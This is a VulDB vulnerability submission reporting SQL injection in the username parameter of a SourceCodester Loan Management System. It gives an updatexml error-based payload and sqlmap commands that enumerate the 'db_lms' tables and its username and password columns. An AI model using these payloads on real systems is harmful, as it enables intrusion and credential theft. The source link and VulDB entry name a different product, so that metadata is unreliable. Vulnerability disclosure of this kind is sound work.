Submit #43468: Loan Management System have SQL inject Vulnerabilityinfo

TitelLoan Management System have SQL inject Vulnerability
BeschreibungIn the modification of personal data of this System, Sql injection vulnerability exists in usernameparameter, which can be used by attackers to steal malicious information. Process demonstration Login interface, enter a single quote to test whether there is SQL injection https://img-blog.csdnimg.cn/2bb9b9dc6a1f44e086d13f383c6fbd6e.png There is SQL injection. At the same time, it is verified that the closing method is single-quote closure. Try single-quote injection. Inject the payload as ``` 1' and updatexml(1,concat(0x7e,database(),0x7e),1)# ``` https://img-blog.csdnimg.cn/0d1685af002c46489e19a2da934dfa86.png burpsuite to capture packets to obtain data packets https://img-blog.csdnimg.cn/06610f8b1d51457882ee778dc7375092.png Use the tool sqlmap to attack and obtain the data table payload ``` python sqlmap.py -r "D:\sqlmap\3.txt" -D "db_lms" --tables ``` https://img-blog.csdnimg.cn/0d83b95d16e54ad686fc975ce2a79c43.png ``` Get column information payload ``` python sqlmap.py -r "D:\sqlmap\3.txt" -D "db_lms" -T "user" --columns ``` https://img-blog.csdnimg.cn/1ccadd6933ef463d8129463d5ea37489.png Get field information payload ``` python sqlmap.py -r "D:\sqlmap\3.txt" -D "db_lms" -T "user" -C "username,password" --columns ``` https://img-blog.csdnimg.cn/b7bfb674c4a34d4db7c63624a12be7e0.png source link https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html
Quelle⚠️ https://www.sourcecodester.com/visual-basic-net/13253/automated-beer-parlour-billing-system.html
Benutzer
 quan9i (UID 30726)
Einreichung11.08.2022 16:54 (vor 4 Jahren)
Moderieren12.08.2022 12:48 (20 hours later)
StatusAkzeptiert
VulDB Eintrag206247 [SourceCodester Automated Beer Parlour Billing System Login Benutzername SQL Injection]
Punkte20

Do you want to use VulDB in your project?

Use the official API to access entries easily!